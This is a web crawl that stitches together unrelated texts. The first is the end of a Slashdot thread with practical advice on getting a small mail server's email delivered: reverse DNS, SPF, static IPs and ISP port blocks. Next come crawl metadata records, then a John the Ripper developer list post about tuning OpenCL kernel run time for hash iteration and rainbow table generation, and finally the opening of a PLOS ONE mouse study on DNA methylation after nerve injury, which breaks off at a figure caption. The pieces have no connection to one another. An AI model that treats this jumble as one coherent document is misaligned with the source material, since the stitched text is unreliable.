Once all completed, be sure you test out your handy work over at http://www.mxtoolbox.com/ [mxtoolbox.com] Good luck.
• Assuming the domain in question is softegg.com, then reverse DNS is indeed not setup correctly, and it is no surprise that his email is getting blocked.
• Correct. a reverse lookup points to (static-71-178-232-50.washdc.fios.verizon.net) which means he hasn't set up a PTR yet. He needs to simply call his ISP and create one over the phone. A process that should take all but 5 minutes. Another problem I see is what's listed in the SMTP banner of the responding mail server. I'm not sure localhost.localdomain is valid. And while he's at it, cleanup those MX records. I don't see why there's triplicate of the same IP with different weighting. Not that this will cau
• A few things to try (Score:5, Informative)
by chrisgeleven (514645) on Monday February 21, 2011 @06:05PM (#35273132) Homepage
1) Get a static IP address for your mail server if you don't already have one. Many mail servers use DNSBL blacklists that distrust anyone with a Dynamic IP address.
2) Get your ISP to configure Reverse DNS for your mail server's IP address. Many mail servers reject mail because Reverse DNS isn't configured properly.
3) Make sure your server is set to not run as an open relay.
4) Have a proper abuse@ and postmaster@ e-mail addresses so e-mail providers who claim to have spam complaints against your domain can actually send them to you.
5) Setup an SPF record (openspf.org has a great wizard for this) for your domain. SPF records basically specify which mail servers are allowed to send mail from your domain. This will help cut down on spammers spoofing e-mail addresses at your domain and increases the odds of legit e-mail not being marked as spam.
Not all of these will guarentee delivery of any e-mail, but they can certainly improve the odds.
• Forward 25 port to SSL one - thats how we do it at company where I work. 25 port is blocked cause of spam.
• by Imagix (695350) on Monday February 21, 2011 @06:08PM (#35273170)
First question... do you have a residential or a business link? That usually changes the network preferences. As I recall most residential agreements prohibit running servers on the network to begin with.
• 1) Talk to your ISP and get the block removed.
2) Change registrars / DNS providers to EasyDNS. They do mail forwarding for customers. Don't bother if you send spam - they'll quickly shut you down.
3) Set up a VPS somewhere - Linode's are great. They all come with dedicated IP addresses.
4) Farm it out - let Google handle it for you.
• I've run my own mail server since the .UUCP domain and comp.mail.maps. For a very long time now, we have not been accepting MUA->MTA mail on port 25. We have been using port 587 for MUA->MTA. MTA->MTA is port 25 and has been for a very long time. However, you don't try to connect to anyone else's port 25 from your cable or DSL modem unless you have setup some sort of non-home internet access and signed an AUP... Even then, chances are your cableco or telco will insist you relay through their mai
• They are cheap, allow you full control over your RDNS, and will solve your problems.
• Unless you have people breaking down your doors, shooting anyone who gets in their way and lobbing a grenade into your server room then no, there isn't a "war" against small email servers.
• by toby (759)
Works for me.
• Here I am, reading between the lines, again.
The laws that apply to government having access to ISPs, to access email records, are very different then the laws that apply to your own server. It is MUCH harder to get emails, legally, from you directly (or, more specifically, your server), primarily because you probably wouldn't just hand them over like ISPs do. Secondary is the fact that they often don't want us to KNOW we are being scrutinized and a subpoena pretty much blows that particular fish out of the
• My ISP blocks port 25 and I'm glad they do because it stops botted machines from setting up spam servers. The point is that if I want port 25 opened, all I have to do is ask - Have you asked Verizon and Comcast to open the port?
• I use a small local ISP. When my server got blocked because it was in a block of IPs normally assigned as dynamic, I called them, explained the situation, and they assigned me a fixed IP from another block.
Sure, I could save $20/month by using comcast, but I talk to a real engineer who sits at a desk 60 miles from me. What's more they actually understand what I'm talking about. When one of their routers took a dump, and I traced my failure to it, they took my traceroutes seriously and dispatched a crew.
Y
"More software projects have gone awry for lack of calendar time than for all other causes combined." -- Fred Brooks, Jr., _The Mythical Man Month_
Working...
|
{
"url": "http://ask.slashdot.org/story/11/02/21/215258/Ask-Slashdot-Is-There-a-War-Against-Small-Mail-Servers?from=rss",
"source_domain": "ask.slashdot.org",
"snapshot_id": "crawl=CC-MAIN-2015-06",
"warc_metadata": {
"Content-Length": "304484",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:2PEAZ6QRXHBQ4TXZQK3HHREMJ4KQL6NH",
"WARC-Concurrent-To": "<urn:uuid:e4520916-f847-4143-a80b-57af0a0cc476>",
"WARC-Date": "2015-01-31T16:12:04Z",
"WARC-IP-Address": "216.34.181.48",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:UE6RUJJNAD2XVBALDZGJ6JAMHDPNXULC",
"WARC-Record-ID": "<urn:uuid:6a6d474c-ec77-44fd-92ca-6eac2570d972>",
"WARC-Target-URI": "http://ask.slashdot.org/story/11/02/21/215258/Ask-Slashdot-Is-There-a-War-Against-Small-Mail-Servers?from=rss",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:af79a633-cfed-4db2-85fb-fca39ee8c276>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-180-212-252.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-06\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for January 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
92,
93,
95,
96,
97,
98,
120,
134,
170,
171,
232,
233,
253,
289,
976,
1042,
1043,
1100,
1101,
1118,
1160,
1161,
1261,
1262,
1490,
1491,
1600,
1601,
1633,
1634,
1660,
1661,
1693,
1740,
1795,
1892,
2022,
2023,
2052,
2053,
2538,
2539,
2572,
2573,
2599,
2600,
2722,
2723,
2752,
2753,
2829,
2830,
2866,
2867,
2896,
2897,
3028,
3029,
3045,
3046,
3095,
3096,
3172,
3173,
3297,
3298,
3314,
3315,
3401,
3525,
3639,
3657,
3658,
3771,
3784,
3785,
3810,
3811,
3986,
3987,
4163,
4164,
4194,
4195,
4347,
4348,
4514,
4668,
4669,
4761,
4762,
4865,
4866,
4909,
4910,
4937,
4938,
5010,
5011,
5181,
5182,
5474,
5475,
5616,
5617,
6020,
6021,
6052,
6053,
6141,
6142,
6394,
6395,
6442,
6443,
6524,
6525,
6826,
6827,
7033,
7034,
7060,
7061,
7198,
7199,
7243,
7244,
7378,
7379,
7559,
7560,
7586,
7587,
7795,
7796,
8113,
8114,
8232,
8233,
8677,
8678,
8711,
8712,
8749,
8750,
8900,
8933,
8934,
8993,
8994,
9166,
9167,
9197,
9198,
9273,
9274,
9331,
9332,
9407,
9408,
9476,
9477,
9614,
9615,
9641,
9642,
9712,
9713,
9789,
9790,
10115,
10116,
10141,
10142,
10366,
10367,
10674,
10675,
10931,
11219,
11220,
11458,
11459,
11646,
11790,
11869,
11994,
12070,
12071,
12395,
12396,
12578,
12579,
12621,
12622,
12716,
12717,
12912,
12913,
12964,
13058,
13059,
13128,
13207,
13208,
13260,
13340,
13341,
13397,
13455,
13525,
13526,
13590,
13591,
13697,
13698,
14190,
14218,
14219,
14300,
14301,
14422,
14423,
14481,
14617,
14618,
14868,
14869,
15009,
15142,
15143,
15547,
15548,
15771,
15772,
16094,
16095,
16118,
16119,
16347,
16348,
16413,
16414,
16532,
16533,
16678,
16679,
16764,
16765,
16798,
16799,
17446,
17447,
17765,
17766,
18090,
18091,
18758,
18759,
18832,
18833,
18865,
18866,
18952,
19039,
19126,
19201,
19226,
19302,
19326,
19343,
19344,
19462,
19463,
20011,
20012,
20518,
20519,
20901,
20983,
21104,
21105,
21326,
21327,
21994,
22171,
22172,
22211,
22212,
22528,
22554,
22609,
22861,
22862,
23008,
23009,
23036,
23037,
23049,
23050,
23286,
23287,
23532,
23533,
24062,
24063,
24131,
24132,
24543,
24544,
24780,
24781,
24854,
24855,
25191,
25192,
25442,
25443,
25716,
25717,
25867,
25868,
25989,
25990,
26087,
26088,
26235,
26236,
26250,
26251,
26340,
26341,
26585,
26586,
27031,
27032,
27177,
27178,
27422,
27423,
27713,
27714,
27855,
27856,
28021,
28022,
28416,
28417,
28428,
28429,
28509,
28510,
29047,
29048,
29079,
29080,
29154,
29155,
29662,
29663,
29748,
29749,
29854,
29855,
30028,
30208,
30310,
30394,
30395,
30517,
30518,
30677,
30678,
31199,
31200,
31247,
31248,
31335,
31336,
31506,
31663,
31728,
31894,
32214,
32215,
32316,
32317,
32428,
32429,
32501,
32710,
32761,
32916,
33011,
33062,
33063,
33568,
33657,
33658,
33851,
33869,
33887,
33936,
33937,
34409,
34410,
34643,
34854,
34855,
35162,
35163,
35169,
35170,
35318,
35319
],
"line_end_idx": [
92,
93,
95,
96,
97,
98,
120,
134,
170,
171,
232,
233,
253,
289,
976,
1042,
1043,
1100,
1101,
1118,
1160,
1161,
1261,
1262,
1490,
1491,
1600,
1601,
1633,
1634,
1660,
1661,
1693,
1740,
1795,
1892,
2022,
2023,
2052,
2053,
2538,
2539,
2572,
2573,
2599,
2600,
2722,
2723,
2752,
2753,
2829,
2830,
2866,
2867,
2896,
2897,
3028,
3029,
3045,
3046,
3095,
3096,
3172,
3173,
3297,
3298,
3314,
3315,
3401,
3525,
3639,
3657,
3658,
3771,
3784,
3785,
3810,
3811,
3986,
3987,
4163,
4164,
4194,
4195,
4347,
4348,
4514,
4668,
4669,
4761,
4762,
4865,
4866,
4909,
4910,
4937,
4938,
5010,
5011,
5181,
5182,
5474,
5475,
5616,
5617,
6020,
6021,
6052,
6053,
6141,
6142,
6394,
6395,
6442,
6443,
6524,
6525,
6826,
6827,
7033,
7034,
7060,
7061,
7198,
7199,
7243,
7244,
7378,
7379,
7559,
7560,
7586,
7587,
7795,
7796,
8113,
8114,
8232,
8233,
8677,
8678,
8711,
8712,
8749,
8750,
8900,
8933,
8934,
8993,
8994,
9166,
9167,
9197,
9198,
9273,
9274,
9331,
9332,
9407,
9408,
9476,
9477,
9614,
9615,
9641,
9642,
9712,
9713,
9789,
9790,
10115,
10116,
10141,
10142,
10366,
10367,
10674,
10675,
10931,
11219,
11220,
11458,
11459,
11646,
11790,
11869,
11994,
12070,
12071,
12395,
12396,
12578,
12579,
12621,
12622,
12716,
12717,
12912,
12913,
12964,
13058,
13059,
13128,
13207,
13208,
13260,
13340,
13341,
13397,
13455,
13525,
13526,
13590,
13591,
13697,
13698,
14190,
14218,
14219,
14300,
14301,
14422,
14423,
14481,
14617,
14618,
14868,
14869,
15009,
15142,
15143,
15547,
15548,
15771,
15772,
16094,
16095,
16118,
16119,
16347,
16348,
16413,
16414,
16532,
16533,
16678,
16679,
16764,
16765,
16798,
16799,
17446,
17447,
17765,
17766,
18090,
18091,
18758,
18759,
18832,
18833,
18865,
18866,
18952,
19039,
19126,
19201,
19226,
19302,
19326,
19343,
19344,
19462,
19463,
20011,
20012,
20518,
20519,
20901,
20983,
21104,
21105,
21326,
21327,
21994,
22171,
22172,
22211,
22212,
22528,
22554,
22609,
22861,
22862,
23008,
23009,
23036,
23037,
23049,
23050,
23286,
23287,
23532,
23533,
24062,
24063,
24131,
24132,
24543,
24544,
24780,
24781,
24854,
24855,
25191,
25192,
25442,
25443,
25716,
25717,
25867,
25868,
25989,
25990,
26087,
26088,
26235,
26236,
26250,
26251,
26340,
26341,
26585,
26586,
27031,
27032,
27177,
27178,
27422,
27423,
27713,
27714,
27855,
27856,
28021,
28022,
28416,
28417,
28428,
28429,
28509,
28510,
29047,
29048,
29079,
29080,
29154,
29155,
29662,
29663,
29748,
29749,
29854,
29855,
30028,
30208,
30310,
30394,
30395,
30517,
30518,
30677,
30678,
31199,
31200,
31247,
31248,
31335,
31336,
31506,
31663,
31728,
31894,
32214,
32215,
32316,
32317,
32428,
32429,
32501,
32710,
32761,
32916,
33011,
33062,
33063,
33568,
33657,
33658,
33851,
33869,
33887,
33936,
33937,
34409,
34410,
34643,
34854,
34855,
35162,
35163,
35169,
35170,
35318,
35319,
35329
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 35329,
"ccnet_original_nlines": 415,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.40081825852394104,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.04289297014474869,
"rps_doc_frac_lines_end_with_ellipsis": 0.009615380316972733,
"rps_doc_frac_no_alph_words": 0.206678107380867,
"rps_doc_frac_unique_words": 0.23852747678756714,
"rps_doc_mean_word_length": 4.484115123748779,
"rps_doc_num_sentences": 412,
"rps_doc_symbol_to_word_ratio": 0.004355289973318577,
"rps_doc_unigram_entropy": 6.08976411819458,
"rps_doc_word_count": 5949,
"rps_doc_frac_chars_dupe_10grams": 0.054730840027332306,
"rps_doc_frac_chars_dupe_5grams": 0.09731593728065491,
"rps_doc_frac_chars_dupe_6grams": 0.07969710975885391,
"rps_doc_frac_chars_dupe_7grams": 0.06732644140720367,
"rps_doc_frac_chars_dupe_8grams": 0.06582695990800858,
"rps_doc_frac_chars_dupe_9grams": 0.06335283070802689,
"rps_doc_frac_chars_top_2gram": 0.003711200086399913,
"rps_doc_frac_chars_top_3gram": 0.012595590204000473,
"rps_doc_frac_chars_top_4gram": 0.014170040376484394,
"rps_doc_books_importance": -3367.278076171875,
"rps_doc_books_importance_length_correction": -3367.278076171875,
"rps_doc_openwebtext_importance": -2165.863037109375,
"rps_doc_openwebtext_importance_length_correction": -2165.863037109375,
"rps_doc_wikipedia_importance": -1603.830810546875,
"rps_doc_wikipedia_importance_length_correction": -1603.830810546875
},
"fasttext": {
"dclm": 0.036520298570394516,
"english": 0.9587188363075256,
"fineweb_edu_approx": 1.2456254959106445,
"eai_general_math": 0.05094486102461815,
"eai_open_web_math": 0.15861117839813232,
"eai_web_code": 0.04247212037444115
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "004.67",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
},
"secondary": {
"code": "005.462",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "5",
"label": "Comment Section"
},
"secondary": {
"code": "18",
"label": "Q&A Forum"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
2,224,262,765,282,631,400
|
Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Mon, 25 Jun 2012 17:02:44 -0700
From: Bit Weasil <[email protected]>
To: Solar Designer <[email protected]>
Cc: [email protected]
Subject: Re: OpenCL kernel max running time vs. "ASIC hang"
> I understand that reducing the amount of parallelism in a kernel
> invocation slows things down, but why not reduce the amount of work per
> kernel invocation by other means - specifically, in your example, why
> not reduce the number of SHA-1 iterations per kernel invocation? We may
> invoke the kernel more than once from one crypt_all() call,
> sequentially. For example, the 256k may be achieved by 256 invocations
> of a kernel doing 1k iterations. This would bring the 9 seconds down to
> 35 ms per kernel invocation. Perhaps the intermediate results can even
> stay in the GPU between those invocations.
>
This is what I do with my rainbow table generation (which is, in many
cases, functionally the same as a "slow" kernel). I take an initial
password, hash/reduce it many times (say, 200 000 for my current tables),
and store the end result. I do this with tunable kernel execution times
(this is the task that was getting ASIC hangs until I adjusted it down).
I simply store the intermediate values in the GPU global memory. The
access (if done sanely) is coalesced, and is roughly speaking a "best case"
memory access pattern for both the load and the store. I'm using a high
resolution timer class to dynamically adjust the work done per kernel
invocation. If I'm below 90% or above 110% of my target time, I adjust the
steps per invocation for the next call. It seems to work nicely, and also
properly handles conditions like an overheating GPU that throttles, or
someone gaming in the background. The only caution I have with this
approach is that it is possible to get 0 steps per invocation in certain
conditions, and this will not self correct - the task does not accomplish
anything. You need a lower bound so that it can correct for a temporary
glitch.
It shouldn't be difficult to take a single execution kernel and break it
into multiple steps. If you would like a starting point, the Cryptohaze
tools have this done for all the GPU kernels - feel free to take a look
around.
Content of type "text/html" skipped
Powered by blists - more mailing lists
Your e-mail address:
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.
|
{
"url": "https://www.openwall.com/lists/john-dev/2012/06/26/2",
"source_domain": "www.openwall.com",
"snapshot_id": "crawl=CC-MAIN-2018-39",
"warc_metadata": {
"Content-Length": "7352",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:EYVDMZZDVVHAX5N3N7MEC6TODUSS6RXX",
"WARC-Concurrent-To": "<urn:uuid:debf74f2-4b09-4335-8614-8a6404a0c7a2>",
"WARC-Date": "2018-09-20T07:00:40Z",
"WARC-IP-Address": "195.42.179.202",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:XSMNOJKHU2VWG25DOKGGYDRSP3OV2365",
"WARC-Record-ID": "<urn:uuid:89fdcf73-fa70-44e1-bb7f-639fb9e7609f>",
"WARC-Target-URI": "https://www.openwall.com/lists/john-dev/2012/06/26/2",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:40ff429f-6018-4fac-9f51-a18dcac5340a>"
},
"warc_info": "isPartOf: CC-MAIN-2018-39\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for September 2018\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-65-123-119.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
74,
148,
186,
225,
265,
297,
357,
358,
425,
499,
571,
646,
708,
782,
857,
931,
976,
978,
979,
1049,
1118,
1192,
1265,
1338,
1339,
1409,
1485,
1558,
1628,
1704,
1779,
1850,
1919,
1992,
2066,
2139,
2147,
2148,
2221,
2294,
2366,
2374,
2375,
2411,
2412,
2451,
2452,
2473,
2474
],
"line_end_idx": [
74,
148,
186,
225,
265,
297,
357,
358,
425,
499,
571,
646,
708,
782,
857,
931,
976,
978,
979,
1049,
1118,
1192,
1265,
1338,
1339,
1409,
1485,
1558,
1628,
1704,
1779,
1850,
1919,
1992,
2066,
2139,
2147,
2148,
2221,
2294,
2366,
2374,
2375,
2411,
2412,
2451,
2452,
2473,
2474,
2625
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2625,
"ccnet_original_nlines": 49,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.3633157014846802,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.0317460298538208,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.23280422389507294,
"rps_doc_frac_unique_words": 0.5780885815620422,
"rps_doc_mean_word_length": 4.717948913574219,
"rps_doc_num_sentences": 27,
"rps_doc_symbol_to_word_ratio": 0.005291009787470102,
"rps_doc_unigram_entropy": 5.146484375,
"rps_doc_word_count": 429,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.03952569141983986,
"rps_doc_frac_chars_top_3gram": 0.03754941001534462,
"rps_doc_frac_chars_top_4gram": 0.014822130091488361,
"rps_doc_books_importance": -233.06671142578125,
"rps_doc_books_importance_length_correction": -233.06671142578125,
"rps_doc_openwebtext_importance": -134.4447021484375,
"rps_doc_openwebtext_importance_length_correction": -134.4447021484375,
"rps_doc_wikipedia_importance": -97.57547760009766,
"rps_doc_wikipedia_importance_length_correction": -97.57547760009766
},
"fasttext": {
"dclm": 0.06169861927628517,
"english": 0.9030620455741882,
"fineweb_edu_approx": 2.236936092376709,
"eai_general_math": 0.7355977892875671,
"eai_open_web_math": 0.37527042627334595,
"eai_web_code": 0.6026577949523926
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "004.0285",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
},
"secondary": {
"code": "005.452",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "18",
"label": "Q&A Forum"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "4",
"label": "Advanced Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-2,100,734,620,434,842,600
|
Advertisement
Browse Subject Areas
?
Click through the PLOS taxonomy to find articles in your field.
For more information about PLOS Subject Areas, click here.
• Loading metrics
Peripheral Nerve Injury Is Associated with Chronic, Reversible Changes in Global DNA Methylation in the Mouse Prefrontal Cortex
• Maral Tajerian ,
Contributed equally to this work with: Maral Tajerian, Sebastian Alvarado
Affiliations: Alan Edwards Centre for Research on Pain, Faculty of Medicine, McGill University, Montreal, Canada, Department of Neurology and Neurosurgery, McGill University, Montreal, Canada
• Sebastian Alvarado ,
Contributed equally to this work with: Maral Tajerian, Sebastian Alvarado
Affiliations: Department of Pharmacology and Therapeutics, McGill University, Montreal, Canada, Sackler Program for Epigenetics and Psychobiology, McGill University, Montreal, Canada
• Magali Millecamps,
Affiliations: Alan Edwards Centre for Research on Pain, Faculty of Medicine, McGill University, Montreal, Canada, Faculty of Dentistry, McGill University, Montreal, Quebec, Canada
• Pascal Vachon,
Affiliation: University of Montreal, Department of Veterinary Biomedicine, St-Hyacinthe, Quebec, Canada
• Cecilia Crosby,
Affiliations: Department of Pharmacology and Therapeutics, McGill University, Montreal, Canada, Sackler Program for Epigenetics and Psychobiology, McGill University, Montreal, Canada
• M. Catherine Bushnell,
Affiliations: Alan Edwards Centre for Research on Pain, Faculty of Medicine, McGill University, Montreal, Canada, Department of Anesthesiology, McGill University, Montreal, Canada, Department of Neurology and Neurosurgery, McGill University, Montreal, Canada, Faculty of Dentistry, McGill University, Montreal, Quebec, Canada
• Moshe Szyf ,
[email protected] (MS); [email protected] (LS)
Affiliations: Department of Pharmacology and Therapeutics, McGill University, Montreal, Canada, Sackler Program for Epigenetics and Psychobiology, McGill University, Montreal, Canada
• Laura S. Stone
[email protected] (MS); [email protected] (LS)
Affiliations: Alan Edwards Centre for Research on Pain, Faculty of Medicine, McGill University, Montreal, Canada, Department of Anesthesiology, McGill University, Montreal, Canada, Department of Neurology and Neurosurgery, McGill University, Montreal, Canada, Department of Pharmacology and Therapeutics, McGill University, Montreal, Canada, Faculty of Dentistry, McGill University, Montreal, Quebec, Canada
Peripheral Nerve Injury Is Associated with Chronic, Reversible Changes in Global DNA Methylation in the Mouse Prefrontal Cortex
• Maral Tajerian,
• Sebastian Alvarado,
• Magali Millecamps,
• Pascal Vachon,
• Cecilia Crosby,
• M. Catherine Bushnell,
• Moshe Szyf,
• Laura S. Stone
PLOS
x
Abstract
Changes in brain structure and cortical function are associated with many chronic pain conditions including low back pain and fibromyalgia. The magnitude of these changes correlates with the duration and/or the intensity of chronic pain. Most studies report changes in common areas involved in pain modulation, including the prefrontal cortex (PFC), and pain-related pathological changes in the PFC can be reversed with effective treatment. While the mechanisms underlying these changes are unknown, they must be dynamically regulated. Epigenetic modulation of gene expression in response to experience and environment is reversible and dynamic. Epigenetic modulation by DNA methylation is associated with abnormal behavior and pathological gene expression in the central nervous system. DNA methylation might also be involved in mediating the pathologies associated with chronic pain in the brain. We therefore tested a) whether alterations in DNA methylation are found in the brain long after chronic neuropathic pain is induced in the periphery using the spared nerve injury modal and b) whether these injury-associated changes are reversible by interventions that reverse the pathologies associated with chronic pain. Six months following peripheral nerve injury, abnormal sensory thresholds and increased anxiety were accompanied by decreased global methylation in the PFC and the amygdala but not in the visual cortex or the thalamus. Environmental enrichment attenuated nerve injury-induced hypersensitivity and reversed the changes in global PFC methylation. Furthermore, global PFC methylation correlated with mechanical and thermal sensitivity in neuropathic mice. In summary, induction of chronic pain by peripheral nerve injury is associated with epigenetic changes in the brain. These changes are detected long after the original injury, at a long distance from the site of injury and are reversible with environmental manipulation. Changes in brain structure and cortical function that are associated with chronic pain conditions may therefore be mediated by epigenetic mechanisms.
Introduction
Chronic pain is associated with changes in brain structure and function. Multiple studies have now reported decreased brain grey matter and abnormal cortical function associated with chronic pain, and the magnitude of these changes may be related to the duration and the intensity of chronic pain. While changes in some brain regions are associated with specific pain conditions, many studies report changes in common areas involved in pain modulation, including the prefrontal cortex (PFC) (for reviews see [1], [2]. Interestingly, the PFC has also been implicated in depression and anxiety, both of which are co-morbid with chronic pain.
Chronic pain induces and actively maintains pathological changes in the PFC: The induction of nerve injury in normal rats results in the development of hypersensitivity to sensory stimuli and in decreased grey matter in the PFC several months post-injury [3]. Furthermore, reducing chronic pain in humans reverses pain-related changes in PFC structure and function [4], [5]. However, the mechanisms underlying chronic pain-induced neuroplasticity are currently not understood.
Epigenetic modulation of gene expression in response to experience and environmental changes is both dynamic and reversible. Covalent modification of DNA by methylation is a critical epigenetic mechanism resulting in altered gene expression. The recognition of the role of DNA methylation in human disease started in oncology but now extents to other disciplines including neurological disorders, and modulation by DNA methylation is associated with abnormal behavior and pathological gene expression in the central nervous system (CNS). For example, adverse environments early in life result in stable pathological changes in methylation and gene function in the adult [6], [7], [8], [9], [10] that are reversible with epigenetic drugs [11], [12]. A plausible working hypothesis is that long-term changes in DNA methylation in the brain embed signals from transient injury or other exposures to alter genome function in the brain, resulting in either the chronification of pain or contributing to the co-morbid pathologies associated with chronic pain. If this hypothesis is correct, then DNA methylation changes in the brain should be detectable long after exposure to the initial peripheral injury that triggered the chronic pain.
The objectives of the current study were a) to determine if a peripheral nerve injury that triggers long-term, persistent behavioural signs of neuropathic pain and a decrease in grey matter in the PFC several months post-injury [4] also triggers region-specific changes in DNA methylation in the brain that can be detected long after the initial injury and b) to determine whether these changes are sensitive to an environmental manipulation that attenuates pain. The primary findings are a) 5–6 months following peripheral nerve injury, alterations in global DNA methylation are observed in the PFC and amydala but not in the visual cortex or thalamus, b) environmental enrichment reduces both behavioural signs of neuropathic pain and pathological changes in PFC global methylation, and c) PFC global methylation significantly correlates with the severity of mechanical and cold sensitivity. Long-term alterations in DNA methylation could therefore provide a molecular substrate for chronic pain-related alterations in the CNS, forming a “memory trace” for pain in the brain that can be targeted therapeutically.
Materials and Methods
Animals
Two cohorts of 8–10 week-old male CD1 mice (Charles River, St-Constant, QC, Canada) were used. Animals were housed in ventilated polycarbonate cages and received water and rodent diet (Teklad Rodent Diet 2020X) ad libitum.
Animals in the standard environment (Figures 1&2) were housed in groups of 3–4 with a cardboard hut and cotton nesting material. In contrast, the enriched environment consisted of three mice/cage, a home cage running wheel mounted on a plastic hut (Mouse Igloo® with Fast-Trac running wheel, http://www.bio-serv.com), and marbles. In the impoverished environment, each animal was housed singly in an individual cage in the absence of a running wheel, marbles or any other forms of enrichment. All other factors including diet, bedding, access to water and light-dark cycle were identical.
thumbnail
Figure 1. Behavioral Signs of Neuropathic Pain Six Months following Nerve Injury.
Nerve injured mice show a decrease in mechanical thresholds (A) and an increase in acetone-evoked behaviors, indicative of cold sensitivity (B) on the hindpaw, measured by the von Frey filament test and the acetone tests, respectively. In addition, these mice show signs of motor dysfunction, measured by the rotarod assay (C). In the open field assay (D), neuropathic mice do not differ from control mice in overall levels of spontaneous activity, measured by the number of peripheral squares covered in the open field (e). However, they spent less time spent in the central square of the open field, indicative of anxiety-like behavior (f). * = p<0.05, *** = p<0.0001, n = 10/group, error bars indicate S.E.M.
http://dx.doi.org/10.1371/journal.pone.0055259.g001
thumbnail
Figure 2. Global Methylation in the CNS Six Months following Nerve Injury.
